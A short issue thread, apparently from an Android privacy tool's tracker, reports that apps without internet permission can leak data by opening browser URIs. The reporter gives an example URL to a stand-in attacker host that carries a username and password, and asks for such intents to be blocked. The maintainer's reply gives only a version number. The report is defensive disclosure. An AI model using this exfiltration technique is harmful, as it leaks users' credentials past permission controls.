Block URI intents with internet
pulser opened this issue · comments
pulser commented
It's possible to send data without the internet permission, if you make a URL containing the data to send, and send that to a server listening for a GET request.
ie. an app can request a browser to the URI of "www.nastyhacker.example.org/leechdata.php?datatoleech=UserName%20T0ps3cr3tP4ssw0rd" or similar...
I suggest if an app doesn't have internet permission, it gets blocked from calling HTTP URIs
Marcel Bokhorst commented
Version 0.17